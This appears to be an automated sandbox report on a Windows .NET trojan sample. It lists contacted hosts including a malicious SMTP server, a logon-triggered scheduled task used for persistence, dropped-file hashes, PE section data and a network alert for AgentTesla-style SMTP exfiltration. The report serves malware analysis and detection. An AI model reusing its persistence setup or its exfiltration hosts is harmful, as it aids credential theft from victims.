                                                  http://www.jiyu-kobo.co.jp/&-cSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp/jp/--SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp/_-lSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fontbureau.comE.TTFSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://OPBeIPZ8XbJqLOvY6X.netnrQtAokXKaSn.exe, 00000010.00000002.538774344.0000000002B2F000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539333299.0000000002B6A000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539499206.0000000002B7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
IP              Domain                        Country        ASN     ASN Name                  Malicious
3.232.242.170   unknown                       United States  14618   AMAZON-AESUS              false
111.118.212.38  strictfacilityservices.com    India          394695  PUBLIC-DOMAIN-REGISTRYUS  true
52.20.78.240    api.ipify.org.herokudns.com   United States  14618   AMAZON-AESUS              false
                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                  Analysis ID:756116
                                                  Start date and time:2022-11-29 16:49:16 +01:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 12m 47s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:19
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@16/5@8/3
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Time      Type             Description
16:50:37  API Interceptor  432x Sleep call for process: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe modified
16:50:45  Task Scheduler   Run new task: nrQtAokXKaSn path: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
16:51:22  API Interceptor  69x Sleep call for process: nrQtAokXKaSn.exe modified
                                                  No context
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                  Process:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1657
                                                  Entropy (8bit):5.1584897189168
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3PItn:cbha7JlNQV/rydbz9I3YODOLNdq3Ju
                                                  MD5:03051B1F18A035DE03D059366AC0473E
                                                  SHA1:155345324D235531556DDFE9F16B9C056D4C9505
                                                  SHA-256:92BF6136677687B06E7E22A50F24B0DD8B0B5FA6C3A89DA9516AAC6259ACA56D
                                                  SHA-512:1EB4CCBBD475035EAEF04AFCEB318583B8BB26F350AF5B68D7F19D080AEEADA96B67E00DC89DE4CA4608561B3F6AB64D135A505B322D24BBDE60437B8FA491CC
                                                  Malicious:true
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail
                                                  Process:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1657
                                                  Entropy (8bit):5.1584897189168
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3PItn:cbha7JlNQV/rydbz9I3YODOLNdq3Ju
                                                  MD5:03051B1F18A035DE03D059366AC0473E
                                                  SHA1:155345324D235531556DDFE9F16B9C056D4C9505
                                                  SHA-256:92BF6136677687B06E7E22A50F24B0DD8B0B5FA6C3A89DA9516AAC6259ACA56D
                                                  SHA-512:1EB4CCBBD475035EAEF04AFCEB318583B8BB26F350AF5B68D7F19D080AEEADA96B67E00DC89DE4CA4608561B3F6AB64D135A505B322D24BBDE60437B8FA491CC
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 847360
Entropy (8bit): 7.451826150772928
Encrypted: false
SSDEEP: 12288:/mMlc1PL/pFr5cE8LHWU/SEdRMA/LyVu6gtXSRxS36qGn3eV6H5ADAUaoZqxIB/N:eqvLj9/L1tsAK/n3eVk55Ul4x+/yIn
MD5: FE1AA7FA995970EBB34465D5DC0D8CE1
SHA1: 7505B261CC9DF8C6AB8F10E035CF8D8319043CDB
SHA-256: 655B12A219D0F0E39A84FE44483E25411BE852CE2BB0D451A1CB1A9A670F70B8
SHA-512: 245277E1F0F637BDA7E2B5D1F76AE06656AEB0A7DF47EB428EDF8C6472F9AF03580234B9CD4A95321A96E6511D9E75279C452C5B58AE182B060A6CA35949A77C
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 32%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....c..............P.................. ... ....@.. .......................`............@.....................................K.... .......................@......[................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............................:..........................................Z(....8.....(....8....*.&~.......*...~....*.b(....8......(....8.....*...&~.......*...~....*..0..~.......8O.......E....$...8....s.........8....s.........8)...*s.........8....s.........8....(....8....s......... .....:....& ....8.......0...........~....o......8......*8....8......0..$.......8....8....8......*.~....o......8.....0...........~....o......8....8....8......*..0...........~....o......8....8....8....
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.451826150772928
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
File size: 847360
MD5: fe1aa7fa995970ebb34465d5dc0d8ce1
SHA1: 7505b261cc9df8c6ab8f10e035cf8d8319043cdb
SHA256: 655b12a219d0f0e39a84fe44483e25411be852ce2bb0d451a1cb1a9a670f70b8
SHA512: 245277e1f0f637bda7e2b5d1f76ae06656aeb0a7df47eb428edf8c6472f9af03580234b9cd4a95321a96e6511d9e75279c452c5b58ae182b060a6ca35949a77c
SSDEEP: 12288:/mMlc1PL/pFr5cE8LHWU/SEdRMA/LyVu6gtXSRxS36qGn3eV6H5ADAUaoZqxIB/N:eqvLj9/L1tsAK/n3eVk55Ul4x+/yIn
TLSH: B0057C9573728973F1CF01359095718C6EBCE543A2A6E2076FB63A8146027BFFA9CE41
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............P.................. ... ....@.. .......................`............@................................
Icon Hash: 00828e8e8686b000
Entrypoint: 0x4d02ee
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x6385E21F [Tue Nov 29 10:42:39 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd02a0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd2000 | 0x5c8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd025b | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xce2f4 | 0xce400 | False | 0.764352509469697 | data | 7.457613017086461 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xd2000 | 0x5c8 | 0x600 | False | 0.427734375 | data | 4.1465073095381015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd4000 | 0xc | 0x200 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xd20a0 | 0x33c | data | |
RT_MANIFEST | 0xd23dc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/29/22-16:51:24.449797 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49717 | 587 | 192.168.2.6 | 111.118.212.38
11/29/22-16:52:18.188399 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49722 | 587 | 192.168.2.6 | 111.118.212.38
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2022 16:50:57.881586075 CET | 49713 | 443 | 192.168.2.6 | 52.20.78.240
Nov 29, 2022 16:50:57.881650925 CET | 443 | 49713 | 52.20.78.240 | 192.168.2.6
Nov 29, 2022 16:50:57.881889105 CET | 49713 | 443 | 192.168.2.6 | 52.20.78.240
Nov 29, 2022 16:50:58.005610943 CET | 49713 | 443 | 192.168.2.6 | 52.20.78.240
Nov 29, 2022 16:50:58.005644083 CET | 443 | 49713 | 52.20.78.240 | 192.168.2.6
Nov 29, 2022 16:50:58.314330101 CET | 443 | 49713 | 52.20.78.240 | 192.168.2.6
Nov 29, 2022 16:50:58.314445019 CET | 49713 | 443 | 192.168.2.6 | 52.20.78.240
Nov 29, 2022 16:50:58.332873106 CET | 49713 | 443 | 192.168.2.6 | 52.20.78.240
Nov 29, 2022 16:50:58.332928896 CET | 443 | 49713 | 52.20.78.240 | 192.168.2.6
Nov 29, 2022 16:50:58.333657026 CET | 443 | 49713 | 52.20.78.240 | 192.168.2.6
Nov 29, 2022 16:50:58.413805962 CET | 49713 | 443 | 192.168.2.6 | 52.20.78.240
Nov 29, 2022 16:50:59.610924959 CET | 49713 | 443 | 192.168.2.6 | 52.20.78.240
Nov 29, 2022 16:50:59.610958099 CET | 443 | 49713 | 52.20.78.240 | 192.168.2.6
Nov 29, 2022 16:50:59.757527113 CET | 443 | 49713 | 52.20.78.240 | 192.168.2.6
Nov 29, 2022 16:50:59.757646084 CET | 443 | 49713 | 52.20.78.240 | 192.168.2.6
Nov 29, 2022 16:50:59.757844925 CET | 49713 | 443 | 192.168.2.6 | 52.20.78.240
Nov 29, 2022 16:50:59.763855934 CET | 49713 | 443 | 192.168.2.6 | 52.20.78.240
Nov 29, 2022 16:51:19.879105091 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:51:20.153131008 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:51:20.155756950 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:51:21.977685928 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:51:21.978070021 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:51:22.252252102 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:51:22.253521919 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:51:22.526686907 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:51:22.527221918 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:51:22.840261936 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:51:23.584398985 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:51:23.585345030 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:51:23.860565901 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:51:23.860614061 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:51:23.860863924 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:51:24.168071032 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:51:24.169872999 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:51:24.442694902 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:51:24.443375111 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:51:24.449796915 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:51:24.449903011 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:51:24.449991941 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:51:24.450061083 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:51:24.722711086 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:51:24.724167109 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:51:24.771972895 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:51:46.825879097 CET | 49720 | 443 | 192.168.2.6 | 3.232.242.170
Nov 29, 2022 16:51:46.825941086 CET | 443 | 49720 | 3.232.242.170 | 192.168.2.6
Nov 29, 2022 16:51:46.826066017 CET | 49720 | 443 | 192.168.2.6 | 3.232.242.170
Nov 29, 2022 16:51:46.846575975 CET | 49720 | 443 | 192.168.2.6 | 3.232.242.170
Nov 29, 2022 16:51:46.846611977 CET | 443 | 49720 | 3.232.242.170 | 192.168.2.6
Nov 29, 2022 16:51:47.147500992 CET | 443 | 49720 | 3.232.242.170 | 192.168.2.6
Nov 29, 2022 16:51:47.147674084 CET | 49720 | 443 | 192.168.2.6 | 3.232.242.170
Nov 29, 2022 16:51:47.156049967 CET | 49720 | 443 | 192.168.2.6 | 3.232.242.170
Nov 29, 2022 16:51:47.156074047 CET | 443 | 49720 | 3.232.242.170 | 192.168.2.6
Nov 29, 2022 16:51:47.156639099 CET | 443 | 49720 | 3.232.242.170 | 192.168.2.6
Nov 29, 2022 16:51:47.261645079 CET | 49720 | 443 | 192.168.2.6 | 3.232.242.170
Nov 29, 2022 16:51:48.546381950 CET | 49720 | 443 | 192.168.2.6 | 3.232.242.170
Nov 29, 2022 16:51:48.546422958 CET | 443 | 49720 | 3.232.242.170 | 192.168.2.6
Nov 29, 2022 16:51:48.813997984 CET | 443 | 49720 | 3.232.242.170 | 192.168.2.6
Nov 29, 2022 16:51:48.814122915 CET | 443 | 49720 | 3.232.242.170 | 192.168.2.6
Nov 29, 2022 16:51:48.814193010 CET | 49720 | 443 | 192.168.2.6 | 3.232.242.170
Nov 29, 2022 16:51:48.816801071 CET | 49720 | 443 | 192.168.2.6 | 3.232.242.170
Nov 29, 2022 16:52:11.437999010 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:52:11.715953112 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:52:11.716146946 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:52:14.190653086 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:52:14.194787025 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:52:14.473042011 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:52:14.499712944 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:52:14.778090954 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:52:14.842102051 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:52:16.164179087 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38
